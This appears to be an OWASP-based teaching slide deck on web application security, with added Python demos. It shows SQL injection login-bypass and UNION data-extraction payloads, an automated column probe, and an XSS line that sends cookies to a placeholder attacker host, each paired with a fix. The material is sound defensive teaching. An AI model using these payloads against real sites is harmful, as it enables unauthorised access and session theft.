Web Application Security

in a 🌰shell

An ultra-compact intro

Copyright (c) Björn Kimminich / @bkimminich

Björn Kimminich

🤐 Famous last words...

“Nobody would bother to hack us.”
“Our network firewall will keep us safe.”
“We have tests for all our use cases.”
“We will add security to the system later.”
“What's the worst that could happen?”

🤔 What is a Vulnerability?

A flaw or weakness in system security procedures, design, implementation, or internal controls that could […] result in a security breach or a violation of the system's security policy.

🤔 What is an Exploit?

A piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug or vulnerability to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic (usually computerized).

🤔 Who are the Attackers?

  • 👶 Script Kiddies
  • 🌱 Hacktivists
  • 💰 Organized Crime
  • 👛 Corrupt / 😡 Disgruntled Employees
  • 🏭 Competitors
  • 🦅 Nation States

💉 Injection

👨‍⚖️ Injection Explained

Smuggling unintended commands into an interpreter along with the data it expects.
You go to court and state your name as "Michael, you are now free to go".
The judge then calls "Michael, you are now free to go", and the bailiffs let you go, because hey, the judge said so.

💻 In software, interpreters are used for accessing...

  • Databases (SQL, HQL, ...)
  • Files (OS Shell, XPath, ...)
  • Access Control Systems (LDAP, ...)
  • ...

🚨 Risks from Injection vulnerabilities

  • Bypassing authentication
  • Spying out data
  • Manipulating data
  • Complete system takeover

🔓 SQLI Authentication Bypass

// VULNERABLE: request parameters are concatenated straight into the SQL text
String query = "SELECT id FROM users " +
           "WHERE name = '" + req.getParameter("username") + "' " +
           "AND password = '" + req.getParameter("password") + "'";

Generates queries like this:

SELECT id FROM users WHERE name = 'bjoern' AND password = 'secret'

🗡️ Attack Examples

Disabling the password check for a known username (username bjoern'--, any password):

SELECT id FROM users WHERE name = 'bjoern'--' AND password = '?'

Logging in without even knowing a username (username ' or 1=1--):

SELECT id FROM users WHERE name = '' or 1=1--' AND password = '?'

Everything after -- is a comment. SQL Server, PostgreSQL and SQLite accept it exactly as shown; MySQL only treats -- as a comment when it is followed by whitespace, so use "-- " (with a trailing space) or # there.

🔭 Spying out Data with SQLI

// VULNERABLE: the search term is concatenated into the LIKE pattern
String query =
        "SELECT * FROM books " +
        "WHERE title LIKE '%" + req.getParameter("query") + "%'";

Generates queries like this:

SELECT * FROM books WHERE title LIKE '%tangled web%'

🗡️ Attack Examples

❌ Appending a UNION with the users table will not work unless both result sets coincidentally have an equal number of columns:

SELECT * FROM books WHERE title LIKE '%'
UNION SELECT * FROM users--%'

❌ ❌ ✅ Probing for the right number of result set columns:

SELECT * FROM books WHERE title LIKE '%'
UNION SELECT 1 FROM users--%'

SELECT * FROM books WHERE title LIKE '%'
UNION SELECT 1,2 FROM users--%'

SELECT * FROM books WHERE title LIKE '%'
UNION SELECT 1,2,3 FROM users--%'

Using known/guessed column names to extract data (the column count must match, and on most databases each column's type must be compatible with the one in the original SELECT):

SELECT * FROM books WHERE title LIKE '%'
UNION SELECT name,email,password FROM users--%'

🎦 Demo

🛡️ Protection against Injection

  • Avoid Interpreters
  • Bind Variables
  • Prepared Statements
  • Least Privileges for app DB user
  • White List Input Validation
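The two SQLI slides above (authentication bypass and spying out data) and the bind-variable fix, played through end to end against a throwaway SQLite database. This is an added example, not code from the original slides; the table layout follows the slides, the rows are constructed for the demo, and the attacker-side column probing is automated the way the ❌ ❌ ✅ sequence does it by hand.

```python
import sqlite3

# Constructed sample data for this demo (not real accounts or books).
USERS = [(1, "bjoern", "bjoern@example.com", "secret"),
         (2, "admin", "admin@example.com", "s3cr3t!")]
BOOKS = [(1, "The Tangled Web", 2011),
         (2, "Web Hacking 101", 2016)]


def make_db():
    """In-memory SQLite database with the two tables the slides query."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, name TEXT, email TEXT, password TEXT)")
    db.execute("CREATE TABLE books (id INTEGER, title TEXT, year INTEGER)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", USERS)
    db.executemany("INSERT INTO books VALUES (?, ?, ?)", BOOKS)
    return db


def login_vulnerable(db, username, password):
    """Same string concatenation as the Java snippet; returns the user id or None.
    SQLite, like SQL Server and PostgreSQL, accepts '--' without a trailing space."""
    query = ("SELECT id FROM users WHERE name = '" + username + "' "
             "AND password = '" + password + "'")
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_fixed(db, username, password):
    """Bind variables: the values travel separately from the SQL text, so quotes
    and comment markers in the input can never change the statement."""
    query = "SELECT id FROM users WHERE name = ? AND password = ?"
    row = db.execute(query, (username, password)).fetchone()
    return row[0] if row else None


def search_vulnerable(db, term):
    """Book search from the slide, built by concatenation."""
    query = "SELECT * FROM books WHERE title LIKE '%" + term + "%'"
    return db.execute(query).fetchall()


def search_fixed(db, term):
    """Prepared statement; the wildcards are added to the bound value, not the SQL."""
    query = "SELECT * FROM books WHERE title LIKE ?"
    return db.execute(query, ("%" + term + "%",)).fetchall()


def probe_column_count(db, max_columns=8):
    """Attacker-side helper: append UNION SELECT 1 / 1,2 / 1,2,3 ... until the
    database stops complaining about mismatched column counts."""
    for n in range(1, max_columns + 1):
        placeholders = ",".join(str(i) for i in range(1, n + 1))
        try:
            search_vulnerable(db, "' UNION SELECT " + placeholders + " FROM users--")
            return n  # the books result set has this many columns
        except sqlite3.OperationalError:
            continue  # "SELECTs ... do not have the same number of result columns"
    return None


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "bjoern'--", "wrong"))    # password check commented out
    print(login_vulnerable(db, "' or 1=1--", "wrong"))   # first user, no username needed
    print(login_fixed(db, "bjoern'--", "wrong"))         # None: the payload is just a name
    print(probe_column_count(db))                         # 3
    print(search_vulnerable(db, "' UNION SELECT name,email,password FROM users--"))
    print(search_fixed(db, "' UNION SELECT 1,2,3 FROM users--"))  # []
```

Note what the fix does not do: login_fixed still compares a plaintext password column, and the application's database user can still read users. Prepared statements close the injection; least privilege for the DB user and proper password hashing (see the authentication section) limit what a different bug can reach.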

📜 Cross Site Scripting (XSS)

💀 Malicious Code is sent...

...to an innocent user's browser through, e.g. a link in a phishing email like the following:
Dear valued customer,

you might be intrerestred in our new special offer! We offer best quailty on the planet for the lowest price possible: Click here for special offer!

Bjorn (Chief Executive Officer)

🚒 Possible Damage from XSS

  • rewriting web page
  • redirecting to malicious site
  • stolen user session
  • stolen sensitive data

📜 XSS Vulnerability Example

Often the search terms are displayed above the results:

String keywords = request.getParameter("keywords");
List<Book> results = titleSearchService.search(keywords.split(" "));
<%-- VULNERABLE: keywords is written into the page without output encoding --%>
There are <%=results.size()%> results for
your search terms <em><%=keywords%></em>
<% for (Book book : results) { %>
  <%-- render result as table rows --%>
<% } %>

🗡️ Attack Examples

Probing for an XSS vulnerability (the classic alert box, sent as the search term):

<script>alert("XSS")</script>

Stealing the user session (the victim's browser "loads" the image and thereby sends its cookies to the attacker's server):

<script>new Image().src="http://my.evil-si.te/hijack.php?c="+encodeURI(document.cookie)</script>

Site defacement: in the same way, injected markup or script can replace the visible page content with whatever the attacker chooses.

🎦 Demo

🛡️ Protection against XSS

  • Avoid including user supplied input into output
  • Output encode all user supplied input
  • Sanitize HTML where user supplied HTML is unavoidable
  • White List Input Validation
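The search-results rendering from the XSS example, once as the vulnerable JSP does it and once with output encoding plus whitelist validation. This is an added example, not code from the original slides; the two payloads are the ones shown on the attack slide, and the keyword whitelist is an assumption about what a book search should accept.

```python
import html
import re

# Payloads from the attack examples, used here as constructed test input.
PROBE = '<script>alert("XSS")</script>'
STEALER = ('<script>new Image().src="http://my.evil-si.te/hijack.php?c="'
           '+encodeURI(document.cookie)</script>')

TEMPLATE = "There are %d results for your search terms <em>%s</em>"


def render_vulnerable(keywords, results):
    """Mirror of the JSP: the raw request parameter is echoed into the page."""
    return TEMPLATE % (len(results), keywords)


def render_fixed(keywords, results):
    """Output-encode the untrusted value for the HTML context it lands in.
    quote=True also covers " and ', so the same function is safe inside
    quoted attribute values; it is NOT sufficient for JavaScript or URL contexts."""
    return TEMPLATE % (len(results), html.escape(keywords, quote=True))


# Whitelist validation as a second, independent layer: letters, digits,
# whitespace and a little punctuation, with a length bound. Rejecting early
# keeps odd input out of the search service as well as out of the page.
KEYWORD_RE = re.compile(r"^[\w\s.,'-]{1,100}$")


def validate_keywords(keywords):
    """True if the search terms contain only whitelisted characters."""
    return KEYWORD_RE.match(keywords) is not None


def handle_search(keywords, search):
    """Request handler: validate, search, then render with encoding.
    `search` is a callable standing in for titleSearchService.search()."""
    if not validate_keywords(keywords):
        return render_fixed("(invalid search terms)", [])
    return render_fixed(keywords, search(keywords.split(" ")))


if __name__ == "__main__":
    books = ["The Tangled Web", "Web Hacking 101"]  # constructed
    search = lambda terms: [b for b in books if all(t.lower() in b.lower() for t in terms)]
    print(render_vulnerable(PROBE, []))      # script tag survives: vulnerable
    print(render_fixed(PROBE, []))           # &lt;script&gt;...: rendered as text
    print(handle_search("tangled web", search))
    print(handle_search(STEALER, search))    # rejected by the whitelist
```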

🔑 Broken Authentication

🤦 Typical Authentication Flaws

  • Allowing weak passwords
  • Storing sensitive data insecurely
  • Using an insecure HTTP connection
  • ...

🏹 Side Channel Attack Vectors

  • Change Password
  • “Remember me”
  • Forgot Password
  • Secret Questions

🎦 Demo

🛡️ Securing Authentication

  • Centralize and standardize authentication
  • Protect credentials with SSL/TLS¹
  • Use a strong mechanism with multiple factors
  • Do not store or log unencrypted credentials²

¹ Serve an HSTS header from your site to protect against protocol downgrade attacks. Also consider applying (via hstspreload.org) to have your domain included in Chromium's HSTS preload list, which the other major browsers consume as well.

² Best avoid storing credentials at all. If you must, use only brute-force-resistant algorithms for password hashing, preferably Argon2, the winner of the Password Hashing Competition.

🚪 Broken Access Control

🔓 Common Authorization Mistakes

  • Hiding things w/o restricting access
  • Displaying only authorized links and menu choices
  • Trusting client-side access control mechanisms
  • Lack of server-side verification of user privileges

🏃 Request Tampering Examples

How could we escalate our privileges here?

🎦 Demo

🛡️ Securing Access Control

  • Never rely on “Security by obscurity”
  • Restrict data and functionality access
  • Enforce user or role based permissions
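The two mistakes the slides call out, trusting a client-side access control mechanism and skipping server-side verification, side by side with the enforced version. This is an added example, not code from the original slides or the demo application. The order store, the hidden "role" form field and the permission table are constructed for the example; the design point is that the request may only ever supply the object id, while identity and role come from the server-side session.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Session:
    """Server-side session state, set at login. Nothing here comes from the request."""
    user_id: int
    role: str  # "customer" or "admin"

# Constructed sample data: order id -> owner and total.
ORDERS = {
    1001: {"owner": 1, "total": 42.0},
    1002: {"owner": 2, "total": 99.0},
}

# Role based permissions. "order:read_any" is what lets support staff open
# orders they do not own; customers only get their own.
PERMISSIONS = {
    "customer": {"order:read"},
    "admin": {"order:read", "order:read_any", "order:delete"},
}


def can(session, permission):
    """Server-side privilege check against the session's role."""
    return permission in PERMISSIONS.get(session.role, set())


def get_order_vulnerable(session, params):
    """Reads the privilege decision from a hidden form field the page itself
    emits (role=customer). Resending the form with role=admin escalates."""
    order = ORDERS.get(int(params["id"]))
    if order is None:
        return 404, None
    if params.get("role") != "admin" and order["owner"] != session.user_id:
        return 403, None
    return 200, order


def get_order(session, params):
    """Only the object id is taken from the request; who is asking, and what
    they may do, is decided from the session and the permission table."""
    try:
        order_id = int(params.get("id", ""))
    except ValueError:
        return 400, None
    order = ORDERS.get(order_id)
    if order is None:
        return 404, None
    if not can(session, "order:read"):
        return 403, None
    if order["owner"] != session.user_id and not can(session, "order:read_any"):
        return 403, None
    return 200, order


if __name__ == "__main__":
    customer = Session(user_id=1, role="customer")
    print(get_order_vulnerable(customer, {"id": "1002", "role": "admin"}))  # (200, ...) escalated
    print(get_order(customer, {"id": "1002", "role": "admin"}))             # (403, None)
    print(get_order(customer, {"id": "1001"}))                              # (200, ...)
    print(get_order(Session(user_id=7, role="admin"), {"id": "1001"}))      # (200, ...)
```

Hiding the link to someone else's order, or disabling the button in the UI, changes nothing in this check, which is the point: the server decides on every request, whether or not the UI offered the action.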

❓ Q&A

👏 Credits

Presentation created with reveal.js

The HTML Presentation Framework

Based on free material provided by OWASP

The Open Web Application Security Project

Background image based on Digital Shodan

by sephiroth-kmfdm


Copyright (c) Björn Kimminich / @bkimminich

Creative Commons License
This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.